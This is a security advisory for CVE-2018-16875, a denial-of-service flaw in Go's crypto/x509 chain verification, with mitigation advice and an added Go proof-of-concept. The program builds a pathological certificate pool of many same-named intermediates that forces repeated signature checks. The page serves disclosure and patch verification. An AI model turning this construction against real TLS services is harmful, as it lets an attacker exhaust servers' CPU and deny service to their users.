PT-2018-3480 · Google · Go
Published
2018-09-07
·
Updated
2025-11-28
·
CVE-2018-16875
CVSS v2.0
7.8
High
| Vector | AV:N/AC:L/Au:N/C:N/I:N/A:C |
Name of the Vulnerable Software and Affected Versions:
Go versions prior to 1.10.6
Go versions 1.11.x prior to 1.11.3
Description:
The crypto/x509 package of Go does not bound the amount of work performed during a single certificate chain verification. When several certificates in the supplied pool match a certificate's issuer name, the verifier attempts a signature check against each candidate, so an attacker who controls the certificates presented in a handshake can craft a pathological chain that forces a very large number of signature checks and exhausts CPU. Go TLS servers that accept client certificates are affected (any connecting client can present such a chain), as are Go TLS clients that connect to an attacker-controlled server. Confidentiality and integrity are not impacted; the effect is denial of service.
Recommendations:
For Go versions prior to 1.10.6, update to version 1.10.6 or later to resolve the issue.
For Go versions 1.11.x prior to 1.11.3, update to version 1.11.3 or later to resolve the issue.
The affected versions expose no configuration setting that bounds this work; the fix in 1.10.6 and 1.11.3 caps the number of signature checks performed inside crypto/x509 for one chain verification and fails the verification once the cap is exceeded. Because Go statically links the standard library, every affected binary must be rebuilt with a fixed toolchain; updating the toolchain alone does not patch deployed binaries. Until that is done, reduce exposure: do not request client certificates on servers reachable from untrusted networks (tls.Config.ClientAuth set to tls.NoClientCert, or terminate mutual TLS at a trusted proxy in front of the Go server), and restrict Go clients to connecting only to servers you trust.
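The following Go program is an added example, not part of this advisory or of the Go project's code. It constructs the kind of input the description refers to: a pool of n intermediate CAs that all carry the same subject name but different keys, and a leaf whose issuer name matches that subject although none of them signed it, so the verifier has to attempt a signature check against every name-matching candidate. The names "Trusted Root", "Shared Intermediate" and "leaf.example" and the functions PathologicalVerify, newCA and IsSignatureCheckLimitError are this example's own. The error text it looks for is the one crypto/x509 returns in the fixed releases when the per-verification cap on signature checks is exceeded; on an affected Go version the verifier would instead perform all n checks and report only an unknown-authority error, which is the behaviour an attacker scales up to exhaust CPU.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"fmt"
	"math/big"
	"strings"
	"time"
)

// newCA issues a CA certificate with the given common name, signed by parent
// (self-signed when parent is nil). Each call uses a fresh P-256 key.
func newCA(cn string, parent *x509.Certificate, parentKey *ecdsa.PrivateKey, serial int64) (*x509.Certificate, *ecdsa.PrivateKey, error) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, nil, err
	}
	tmpl := &x509.Certificate{
		SerialNumber:          big.NewInt(serial),
		Subject:               pkix.Name{CommonName: cn},
		NotBefore:             time.Now().Add(-time.Hour),
		NotAfter:              time.Now().Add(24 * time.Hour),
		IsCA:                  true,
		BasicConstraintsValid: true,
		KeyUsage:              x509.KeyUsageCertSign,
	}
	if parent == nil {
		parent, parentKey = tmpl, key
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, parent, &key.PublicKey, parentKey)
	if err != nil {
		return nil, nil, err
	}
	cert, err := x509.ParseCertificate(der)
	return cert, key, err
}

// PathologicalVerify builds the attacker-shaped input (constructed here, not
// captured from a real handshake): n intermediates named "Shared Intermediate"
// with distinct keys, and a leaf issued under that name by a CA that is in no
// pool. crypto/x509 picks candidate issuers by name, so it must try a signature
// check against all n before it can give up. Returns the Verify error.
func PathologicalVerify(n int) error {
	root, rootKey, err := newCA("Trusted Root", nil, nil, 1)
	if err != nil {
		return err
	}
	roots := x509.NewCertPool()
	roots.AddCert(root)
	intermediates := x509.NewCertPool()
	for i := 0; i < n; i++ {
		ca, _, err := newCA("Shared Intermediate", root, rootKey, int64(1000+i))
		if err != nil {
			return err
		}
		intermediates.AddCert(ca)
	}
	// The CA that really signed the leaf; only its subject name matches the pool.
	rogue, rogueKey, err := newCA("Shared Intermediate", nil, nil, 2)
	if err != nil {
		return err
	}
	leafKey, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return err
	}
	leafTmpl := &x509.Certificate{
		SerialNumber: big.NewInt(3),
		Subject:      pkix.Name{CommonName: "leaf.example"},
		NotBefore:    time.Now().Add(-time.Hour),
		NotAfter:     time.Now().Add(24 * time.Hour),
		KeyUsage:     x509.KeyUsageDigitalSignature,
	}
	der, err := x509.CreateCertificate(rand.Reader, leafTmpl, rogue, &leafKey.PublicKey, rogueKey)
	if err != nil {
		return err
	}
	leaf, err := x509.ParseCertificate(der)
	if err != nil {
		return err
	}
	_, err = leaf.Verify(x509.VerifyOptions{Roots: roots, Intermediates: intermediates})
	return err
}

// IsSignatureCheckLimitError reports whether err is the failure a fixed Go
// (1.10.6, 1.11.3 and later) returns once one chain verification exceeds its
// cap on signature checks; the message text is crypto/x509's own.
func IsSignatureCheckLimitError(err error) bool {
	return err != nil && strings.Contains(err.Error(), "signature check attempts limit reached")
}

func main() {
	for _, n := range []int{10, 200} {
		err := PathologicalVerify(n)
		fmt.Printf("%3d name-matching candidates: cap hit=%v (%v)\n", n, IsSignatureCheckLimitError(err), err)
	}
}
```

With 10 candidates the verification fails with the ordinary "certificate signed by unknown authority" error after 10 signature checks; with 200 candidates a fixed Go stops at the cap and returns the limit error instead of checking all 200. Running the 200-candidate case under an affected toolchain is what turns this into a CPU denial of service, since nothing there stops the attacker from presenting far more candidates.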
Exploit
Fix
DoS
Improper Certificate Validation
Related identifiers
Affected products
Alt Linux
Go
Suse